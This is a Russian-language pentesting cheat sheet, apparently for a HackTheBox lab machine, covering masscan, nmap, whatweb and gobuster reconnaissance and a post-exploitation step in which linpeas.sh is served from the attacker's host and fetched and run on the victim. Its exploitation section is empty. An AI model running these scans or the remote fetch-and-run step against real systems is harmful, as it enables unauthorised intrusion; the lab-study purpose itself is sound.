# Взлом
## Разведка
### masscan
> masscan -e tun0 -p1-65535,U:1-65535 10.10.10.165 --rate=1000
### Nmap
сканирует машину на порты, определяет службы, может искать уязвимости но плохо и медленно
> nmap -Pn -n -vvv -T4 -sS -sV --version-all -sC -O -p- --open -oA log_file name_comp
где:
* -Pn - выключить пинг-сканирование, и считать, что все целевые адреса существуют
* -n - не выполняем обратный резолв
* -vvv - подробнй вывод
* -T4 - скорость, по дефолту Т3
* -sS - syn сканирование открытых портов
* -sV - определяем версию сервисов
* –version-all - более расширенные проверки
* -sC - нмап скриптинг энжин (дефолтный набор скриптов)
* -O - определение версии ОС
* -p- - сканирование всех портов(по умолчанию нмап сканит первые 1000 портов по TCP)
* –open - хотим получить только открытые порты
* -oA - вывод во всех форматах
* log_file - файлик с отчетом
* name_comp - имя нашей машинки
*
### whatweb
### whatweb
анализирует web сайт(стек технологии)
> whatweb --list-plugins
> whatweb -a 3 --log-brief=horizonall_whtweb.log http://api-prod.horizontall.htb
где:
* -а - агрессивный тип, всего их 4, отдельно почитать можно в хелпе
* –log-brief - файл куда запишим лог сканирования
в выводе увидим
```
http://horizontall.htb
http://horizontall.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ub
```
### gobuster
переберает по списку папки и файлы на жертве и если находит сообщает.
> gobuster -h
> gobuster dir -h | ищет папки
> gobuster vhost -h | ищет виртуальные хосты(посути вирт машины)
пример:
> gobuster dir -u http://horizontall.htb -k -t 50 -b 404,403 -x txt,html,bak,old -o gb_hr.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
где:
* -k - пропускаем проверку сертификаты
* -t - количество потоков т.е. одновременных соединений
* -b - исключаем коды, которые нам не интересны, например 404 или 403. Ответы с ними не смотрим
* -x - список расширений, которые подходят к нашей технологии
* -о - название файла куда пишим результат
* -w - словарь
*
## Анализ уязвимостей(поиск в интернете и тд)
Поиск эксплойтов для CMS Strapi, где Strapi- это название CMS(Content Management System)
ищем в гугле strapi cms exploit
## Эксплуатация (взлом)
## ПостЭксплуатация (работа на жертве)
### linpeas -поиск уязвимостей на жертве
**1. На своей машине**
Для начала скачаем linpeas командой
> wget https://github.com/carlospolop/PEASS-ng/releases/download/20220529/linpeas.sh
затем в одной консоли поднимем сервер
> python3 -m http.server 80
**2. На машине жертвы**
скачаем
> wget http://10.10.14.3/linpeas.sh
запустим
bash linpeas.sh
посмотрим результат
less -r log_linpeas.txt
## команды
### посмотреть порт доступен или нет
nc -zv 192.168.1.200 135
###